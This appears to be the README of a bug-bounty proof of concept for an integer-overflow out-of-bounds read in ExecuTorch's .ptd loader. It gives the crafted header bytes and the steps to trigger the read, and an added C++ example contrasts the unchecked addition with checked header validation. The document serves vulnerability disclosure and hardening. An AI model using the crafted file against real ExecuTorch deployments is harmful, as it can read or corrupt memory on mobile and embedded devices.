---
license: mit
tags:
  - security-research
  - bug-bounty
  - huntr
  - executorch
---

# SECURITY RESEARCH POC -- ExecuTorch `.ptd` integer overflow

This repository contains a **proof-of-concept malicious `.ptd` payload** for a responsible-disclosure bug bounty submission filed at [huntr.com](https://huntr.com) under the Model File Formats program.

**The PoC demonstrates an integer-overflow primitive** in `FlatTensorDataMap::load()`:

- `extension/flat_tensor/flat_tensor_data_map.cpp:224` -- unchecked `u64 + u64 -> size_t` truncation on attacker-controlled header fields
- `extension/flat_tensor/flat_tensor_data_map.cpp:236` -- the same primitive used as the LOAD LENGTH, never bounds-checked
- Sibling code in `runtime/executor/program.cpp:104-109` uses `c10::add_overflows` correctly -- proof that the project knows the right pattern and **missed copies** of it in the extension

PR #19057 ("Fix overflows in et", Apr 24 2026, commit ec5e8e4) hardened the `get_named_data` path of the same file but did NOT touch lines 224/236. In short: a static missed-copy finding, anchored on a bug surface that has already received the maintainers' attention.

## Files

| File | Purpose |
|---|---|
| `malicious.ptd` | 256-byte byte-exact PoC. Two header fields are crafted to wrap on `u64 + u64 -> size_t`. Inspect with `xxd malicious.ptd`. |
| `craft_malicious_ptd.py` | Static crafter -- reproduces `malicious.ptd` from scratch. No ExecuTorch build needed. |
| `verify_unpatched.py` | One-command reviewer-side verifier. Fetches the live `extension/flat_tensor/flat_tensor_data_map.cpp` from `pytorch/executorch` main HEAD and confirms that 7 unguarded `u64+u64` sites are still present alongside 1 correctly guarded `c10::add_overflows`. Runs in <5 seconds. |

## Verification (no ExecuTorch build required)

```bash
pip install urllib3
python verify_unpatched.py
```

Expected output (verbatim):

```
[BUG CONFIRMED] The file uses c10::add_overflows correctly elsewhere (1 call sites) but has 7 unguarded u64+u64 additions on attacker-controlled header fields.
This is the missed-copy of the Aug 2025 CVE-2025-30402/30404/30405 remediation pattern, in a code path that PR #19057 (Apr 24 2026) added overflow guards to OTHER parts of.
```

Inspect the malicious file:

```bash
xxd malicious.ptd | head -5
```

This shows the pair of header values crafted to wrap on addition:

```
00000000: 0000 0000 0000 0000 4648 3031 2800 0000  ........FH01(...
00000010: 4000 0000 0000 0000 00ff ffff ffff ffff  @...............
00000020: ffff ffff 0000 0000 4100 0000 0100 0000  ........A.......
```

(Note: bytes shown are little-endian; `flatbuffer_size = 0xFFFF_FFFF_FFFF_FF00` and `segment_data_size = 0x0000_0001_0000_0041`.)

## Runtime PoC (ExecuTorch build required)

To trigger the OOB read at runtime:

```bash
git clone https://github.com/pytorch/executorch.git
cd executorch && ./install_executorch.sh
# Build the runtime + ASan, then point any FlatTensorDataMap::load() consumer at this file.
```

Under ASan, the load produces a clean `heap-buffer-overflow` report. Without ASan, the result depends on the data loader:

- `BufferDataLoader` -> OOB read into adjacent heap allocations
- `MmapDataLoader` -> OOB read into adjacent VMA pages

On 32-bit ARM (ExecuTorch's primary deployment target -- mobile / embedded / Cortex-M), `size_t` is 32-bit and both header arithmetic sites overflow silently -- a direct heap-corruption-grade primitive.

## Affected component

- **ExecuTorch** (`pytorch/executorch`) -- current `main` HEAD, post-commit `1c9c115`. Pre-patch.
- **File**: `extension/flat_tensor/flat_tensor_data_map.cpp`, lines 224 and 236.
- **Same bug class also unhardened**: `runtime/executor/pte_data_map.cpp:57-60` (out of scope for this report).

## Disclosure status

This PoC is part of a responsible-disclosure submission filed via huntr's Model File Formats bug bounty program. After triage and remediation, this repository will be marked private or deleted.

## Disclaimer

This repository is intended for security research and responsible disclosure only.
Do not use the techniques shown here on systems you do not own or have permission to test.

## Contact

Security researcher: **kais113** (amakais.sales@gmail.com)
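## Example: overflow-checked header validation

The following is an added example, not code from this repository or from ExecuTorch: it shows the `u64 + u64 -> size_t` pattern the report describes next to the guarded form a loader should use, and it goes beyond the single case above by exercising both a 64-bit and a 32-bit `size_t` on the same host. Assumptions, labelled in the code as well: the header field names `flatbuffer_offset` and `segment_base_offset` and the 8-byte-pad / `FH01` / u32-length / four-u64 layout are read off the `xxd` dump in the Verification section (the README itself names only `flatbuffer_size` and `segment_data_size`); the 256-byte file size comes from the Files table; `__builtin_add_overflow` stands in for `c10::add_overflows`; and the `SizeT` template parameter stands in for the target's `size_t`.

```cpp
#include <array>
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <cstring>
#include <limits>

// First 48 bytes of the PoC file, transcribed from the xxd dump in this README
// (constructed here; the remaining bytes are not shown on the page and are not
// needed to validate the header). The README states the file is 256 bytes long.
static const uint8_t kPocHeader[48] = {
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  // padding
    0x46, 0x48, 0x30, 0x31,                          // "FH01"
    0x28, 0x00, 0x00, 0x00,                          // header length 0x28
    0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  // 0x10: flatbuffer_offset (assumed name)
    0x00, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,  // 0x18: flatbuffer_size
    0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,  // 0x20: segment_base_offset (assumed name)
    0x41, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,  // 0x28: segment_data_size
};
static const uint64_t kPocFileSize = 256;

// Assumed field layout, read off the dump rather than taken from ExecuTorch headers.
struct PtdHeader {
  uint64_t flatbuffer_offset;
  uint64_t flatbuffer_size;
  uint64_t segment_base_offset;
  uint64_t segment_data_size;
};

enum class Verdict { Ok, BadHeader, Overflow, OutOfBounds };

static uint64_t rd_le64(const uint8_t* p) {
  uint64_t v = 0;
  for (int i = 7; i >= 0; --i) v = (v << 8) | p[i];
  return v;
}

static void wr_le64(uint8_t* p, uint64_t v) {
  for (int i = 0; i < 8; ++i) p[i] = static_cast<uint8_t>(v >> (8 * i));
}

bool parse_ptd_header(const uint8_t* buf, size_t len, PtdHeader* out) {
  if (len < 48 || std::memcmp(buf + 8, "FH01", 4) != 0) return false;
  uint32_t hdr_len = uint32_t(buf[12]) | (uint32_t(buf[13]) << 8) |
                     (uint32_t(buf[14]) << 16) | (uint32_t(buf[15]) << 24);
  if (hdr_len != 0x28) return false;
  out->flatbuffer_offset = rd_le64(buf + 0x10);
  out->flatbuffer_size = rd_le64(buf + 0x18);
  out->segment_base_offset = rd_le64(buf + 0x20);
  out->segment_data_size = rd_le64(buf + 0x28);
  return true;
}

// The pattern the report describes: add two u64 header fields and store the sum
// in size_t. SizeT stands in for the target's size_t so the 32-bit case can be
// exercised on a 64-bit host. Nothing here notices the wrap or the truncation.
template <typename SizeT>
SizeT unchecked_end(uint64_t offset, uint64_t size) {
  return static_cast<SizeT>(offset + size);
}

// Hardened form: refuse operands that do not fit the target size_t (the
// truncation case), add with an overflow check (__builtin_add_overflow stands in
// for c10::add_overflows), then bounds-check the end against the loader's size.
template <typename SizeT>
Verdict checked_end(uint64_t offset, uint64_t size, SizeT limit, SizeT* end) {
  const uint64_t max = std::numeric_limits<SizeT>::max();
  if (offset > max || size > max) return Verdict::Overflow;
  SizeT sum;
  if (__builtin_add_overflow(static_cast<SizeT>(offset), static_cast<SizeT>(size), &sum))
    return Verdict::Overflow;
  if (sum > limit) return Verdict::OutOfBounds;
  *end = sum;
  return Verdict::Ok;
}

// Validate both (offset, size) pairs of a .ptd header against the file size.
template <typename SizeT>
Verdict validate_ptd(const uint8_t* buf, size_t len, SizeT file_size) {
  PtdHeader h;
  if (!parse_ptd_header(buf, len, &h)) return Verdict::BadHeader;
  SizeT end;
  Verdict v = checked_end<SizeT>(h.flatbuffer_offset, h.flatbuffer_size, file_size, &end);
  if (v != Verdict::Ok) return v;
  return checked_end<SizeT>(h.segment_base_offset, h.segment_data_size, file_size, &end);
}

// Build a header with the same assumed layout for a benign file (constructed values).
std::array<uint8_t, 48> make_header(uint64_t fo, uint64_t fs, uint64_t sb, uint64_t ss) {
  std::array<uint8_t, 48> h{};
  std::memcpy(h.data() + 8, "FH01", 4);
  h[12] = 0x28;
  wr_le64(h.data() + 0x10, fo);
  wr_le64(h.data() + 0x18, fs);
  wr_le64(h.data() + 0x20, sb);
  wr_le64(h.data() + 0x28, ss);
  return h;
}

int main() {
  std::printf("64-bit size_t verdict: %d\n",
              static_cast<int>(validate_ptd<uint64_t>(kPocHeader, sizeof kPocHeader, kPocFileSize)));
  std::printf("32-bit size_t verdict: %d\n",
              static_cast<int>(validate_ptd<uint32_t>(kPocHeader, sizeof kPocHeader,
                                                      static_cast<uint32_t>(kPocFileSize))));
  std::printf("unchecked 32-bit segment end: 0x%x\n",
              unchecked_end<uint32_t>(0xFFFFFFFFull, 0x100000041ull));
  return 0;
}
```

Verdict values map to `Ok=0`, `BadHeader=1`, `Overflow=2`, `OutOfBounds=3`. With a 64-bit `size_t` the PoC header survives the add but fails the bounds check against the 256-byte file; with a 32-bit `size_t` it is rejected before the add because `flatbuffer_size` cannot be represented, which is exactly the truncation the unchecked form performs silently. Both checks are needed: the overflow guard alone (the `c10::add_overflows` pattern) does not catch an in-range sum that still exceeds the loaded data.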